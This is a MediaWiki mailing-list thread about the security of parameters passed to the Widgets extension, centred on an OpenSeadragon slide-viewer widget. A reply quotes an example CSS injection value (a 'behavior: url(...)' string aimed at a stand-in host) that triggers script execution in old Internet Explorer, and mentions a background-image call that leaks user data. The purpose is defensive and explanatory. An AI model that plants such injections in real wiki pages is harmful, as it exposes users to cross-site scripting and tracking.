On Sat, Oct 29, 2016 at 2:50 PM, Dr. Michael Bonert
<michael(a)librepathology.org> wrote:
Hello,
I was wondering about the security of Widgets (
https://www.mediawiki.org/wiki/Extension:Widgets ) that get parameters
passed to them. Any thoughts?
Are the parameters passed through to the widget cleansed of html/scripts?
If it isn't -- is it possible to easily enforce typing/boundaries on the
parameters?
Generally speaking, I am looking for a discussion around security &
widgets.
A widget I created (below) takes three parameters (width, height, filename)
and feeds those to OpenSeadragon(
https://openseadragon.github.io /
https://en.wikipedia.org/wiki/Seadragon_Software ). It works on a testing
server.
OpenSeadragon was discussed in brain storming in 2015 -
https://www.mediawiki.org/wiki/Reading/Quarterly_Brainstorming
My interest in this is virtual (microscopic) slides (e.g.
http://openslide.org/demo/ ) which are often
several gigabytes of data each.
Thanks,
Michael
------------------------
Widget code...
Create page: Widget:OpenSeadragon
---------------------------------------------------------------------
<noinclude>__NOTOC__
<!-- Copyright (c) 2016 Michael Bonert -->
<!-- Released under GNU General Public Licence - Version 3; see
http://www.gnu.org/licenses/gpl.html -->
To insert this widget, use the following code:
<nowiki>{{#widget:</nowiki>{{PAGENAME}}<nowiki>
|image=12881.dzi
|width=800
|height=600
}}</nowiki>
</noinclude>
<includeonly><!-- This inserts an OpenSeadragon image -->
<div id="openseadragon1" style="width:
<!--{$width|default:400|escape:'html'}-->px; height:
<!--{$height|default:300|escape:'html'}-->px;"></div>
<script src="../../openseadragon/openseadragon.min.js"></script>
<script type="text/javascript">
var viewer = OpenSeadragon({
id: "openseadragon1",
prefixUrl: "../../openseadragon/images/",
tileSources:
"../../vslide/<!--{$image|escape:'urlpathinfo'}-->"
});
</script>
</includeonly>
-------------------------------------------------
In theory that's what the escape modifier is for in Smarty parameters.
However, in this example, <!--{$width|default:400|escape:'html'}-->px;
inside a style attribute isn't really sufficient, as a user could set
a width parameter like "400; behavior: url(
'https://foo.com/bar.htc#baz' );x: ", which would cause javascript
execution on IE9 and older. (There are other properties for other
browsers, however mostly affecting only older browsers). You could
also leak private info about your users by doing something like
background-image: url( "http://external.com/foo.png" ) .
[Disclaimer: I have not read the source code of the widgets extension,
so there could also potentially be generic security issues with the
extension. Since I haven't reviewed it, I don't really know].
--
bawolff
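One way to enforce the typing and boundaries Michael asks about, written as an added example (not code from this thread or from the Widgets extension) in the JavaScript the widget already emits: each parameter is coerced to a type and range before it can reach CSS or a URL, so the "400; behavior: url(...)" style payload above is simply dropped. The 4096 pixel bound, the filename pattern and the function names are assumptions.

```javascript
// Added example, not from the thread or the Widgets extension: strict
// parameter handling for the OpenSeadragon widget shown above.
const MAX_DIMENSION = 4096;                         // assumed upper bound
const IMAGE_NAME = /^[A-Za-z0-9_-]{1,64}\.dzi$/;    // assumed allowed filenames
const TILE_BASE = "../../vslide/";                  // path used by the widget

// Return a positive integer within bounds, or the default when the value is
// not a plain decimal integer. "400; behavior: url(...)" fails the regex and
// falls back, so no extra CSS declaration can ride along with the size.
function dimension(value, fallback) {
  const s = (value == null ? "" : String(value)).trim();
  if (!/^\d{1,4}$/.test(s)) return fallback;
  const n = Number(s);
  return n >= 1 && n <= MAX_DIMENSION ? n : fallback;
}

// Accept only a bare .dzi filename: no slashes, colons, quotes or "..", so
// the tile source cannot leave the vslide directory or become a foreign URL
// of the background-image: url("http://external.com/...") kind.
function imageName(value) {
  const s = (value == null ? "" : String(value)).trim();
  if (!IMAGE_NAME.test(s)) throw new Error("invalid image parameter");
  return s;
}

// Build the OpenSeadragon() options from untrusted widget parameters.
// width/height are numbers, never style text, so there is no style
// attribute to inject into.
function buildViewerConfig(params) {
  const width = dimension(params.width, 400);
  const height = dimension(params.height, 300);
  const image = imageName(params.image);
  return {
    id: "openseadragon1",
    prefixUrl: "../../openseadragon/images/",
    tileSources: TILE_BASE + encodeURIComponent(image),
    width,
    height,
  };
}

// Size the container through the DOM style object instead of building an
// attribute string; a number with "px" appended cannot carry a second
// declaration.
function applySize(el, cfg) {
  el.style.width = cfg.width + "px";
  el.style.height = cfg.height + "px";
  return el;
}
```

In the widget itself the parameters are interpolated by the Smarty template before any script runs, so this validation only helps if the raw values reach the page solely as escaped JavaScript string literals (escape:'javascript') that the validator then checks, rather than being written into the style attribute as above. The same checks would otherwise have to be performed server-side before interpolation.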
Just as a p.s. I just poked around
. I looked at
three widgets at random - all 3 had XSS vulnerabilities. Now of
course, 3 is a very small sample size, so it may have been luck of the
draw. Nevertheless, I'd like to take this moment to urge anyone using
a widget made by someone else to review it carefully before use as
many widgets are insecure.
--
bawolff